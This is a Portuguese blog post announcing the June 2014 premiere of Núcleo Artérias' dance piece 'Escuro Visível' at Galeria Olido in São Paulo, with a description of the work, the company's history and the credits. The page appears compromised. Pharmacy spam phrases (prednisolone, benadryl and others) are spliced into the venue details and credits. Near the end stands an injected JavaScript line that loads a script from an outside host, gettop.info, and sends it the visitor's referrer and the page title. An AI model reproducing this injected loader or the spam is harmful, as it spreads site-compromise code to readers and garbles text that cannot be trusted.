ProgramaçãoSão Paulo

Núcleo Artérias estreia Escuro Visível

O que inicia um movimento? Por que continuamos? O que gera potência e intensidade à existência? O que nos conecta?

 

SERVIÇO

 

 

Galeria Olido – Sala Paissandu
Avenida São João, 473 – Centro – São Paulo/SP 

minomycin online games De 19 a 22 de junho de 2014
De quinta a sábado, às 20h. e domingo, às 19h.

Entrada Franca

Horário da bilheteria: uma hora antes do início do espetáculo

Recomendação: 12 anos/ Duração: 40 minutos

www.nucleoarterias.com

 

 

Escuro Visível, dirigido pela coreógrafa Adriana Grechi sale carbozyne , é o mais recente trabalho do Núcleo Artérias e estreia com curta temporada (19 a 22 de junho de 2014) na Galeria Olido, grátis.

O espetáculo conta com instalação sonora do músico Dudu Tsuda, integrante do grupo desde 2003. Durante o período de criação, o grupo formado pelas dançarinas/criadoras Lívia Seixas, Nina Giovelli e Carolina Minozzi recebeu os artistas Marcelo Gabriel, de Belo Horizonte, e Taoufiq Izeddiou, de Marrakech, para a partilha de suas práticas artísticas. Marcelo Gabriel tornou-se um importante parceiro e em duas imersões coordenou e compartilhou com o grupo suas práticas e treinamentos.

Escuro Visível investiga os movimentos do desejo. Percebendo sua ação em cada acontecimento presente, o Núcleo Artérias propõe uma dança de “experiências” onde cada integrante se deixa afetar, afeta o outro e gera transformações em um ambiente compartilhado.

O grupo testou possibilidades de convivência e coletividade em um corpo em constante transformação, onde a experiência contínua do desejo é a força propulsora. Interessado em como forças e intensidades vitais podem ser partilhadas em um ambiente comum, o grupo propõe um espaço de afetos, onde as conexões são tão importantes quanto os indivíduos.

O Núcleo Artérias buscou uma alternativa à produção incessante de desejos voltados ao “sucesso” individual, lançados aos montes nos modos de operar do consumismo. Os integrantes propõem uma dança de “experiências” onde procuram se apropriar de necessidades e desejos mais vitais, em um constante exercício de perceber do que realmente precisamos juntos.

Em Escuro Visível, o grupo explora o risco de expor forças e intensidades íntimas como princípio organizador da ação coletiva, aceitando e reconhecendo cada acontecimento, se deixando afetar, transformar, criando assim uma rede propulsora formada por impulsos necessários.

Lygia Clark fantasiava o mundo como um grande bicho não percebido pelo homem. O Núcleo Artérias emprestou esta ficção e testou o homem (que é ao mesmo tempo mulher) como um grande bicho não percebido pelo homem.

 

O NÚCLEO ARTÉRIAS

Os artistas do Núcleo Artérias se interessam por questões relacionadas ao mundo contemporâneo como instabilidade, incerteza, consumismo, construções de gênero e espetacularização. Os integrantes do grupo experimentam em seus corpos como estas questões estão afetando a nossa percepção e testam outras formas de perceber, transformando modos de operar do próprio corpo e suas possibilidades de conexão com outros corpos.

O Núcleo Artérias é dirigido por Adriana Grechi, coreógrafa graduada na S.N.D.O. (Amsterdã). Em 2004, o Núcleo Artérias recebeu dois prêmios APCA: pesquisa em dança para “Por que nunca me tornei um/a dançarino/a” (produzido pelo 8º Cultura Inglesa Festival) e projeto para “Teorema”. Em 2006, participou do Rumos Dança do Itaú Cultural. Em 2007, recebeu o Fomento Municipal (SP) e realizou circulação nacional. Em 2008, recebeu o prêmio APCA para criação em dança com “Fronteiras Móveis”. Em 2011/2012, o Núcleo foi patrocinado pelo Programa Petrobras Cultural realizando temporadas e circulação nacional. Em 2013, estreou “BANANAS” no 17º Cultura Inglesa Festival em São Paulo.

De 1996 até hoje, o Núcleo Artérias (ex Cia 2 Nova Dança) apresentou seus trabalhos em mais de 40 cidades e participou de diversos festivais, entre eles Panorama de Dança/Rio de Janeiro (1998), Rencontres Chorégraphiques Internationales, de Seine-Saint-Denis/Paris (2002), FID/Belo Horizonte (2005) e On Marche/Marrakech (2012).

 

FICHA TÉCNICA

– Concepção e direção: Adriana Grechi
Criação/performance: Carolina Minozzi, Lívia Seixas e Nina Giovelli
Preparação corporal: Lívia Seixas e Adriana Grechi
Artista provocador/treinamento/colaboração: Marcelo Gabriel
buy prednisolone tablets online Artista provocador: Purchase Taoufiq Izeddiou
Estágio/ colaboração: Isis Andreatta
Purchase Instalação sonora: Dudu Tsuda
Iluminação: André Boll
Fotografia: Edson Kumasaka
Design gráfico: Fernando Bergamini
Produção: Fractal Produção Cultural – Amaury Cacciacarro Filho
Order can you still buy benadryl original Assistência de produção: Erika Fortunato e Guilherme Elias

Este trabalho foi produzido com o apoio do XIV Edital de Fomento à Dança da Secretaria Municipal de Cultura de São Paulo.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Cheap

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.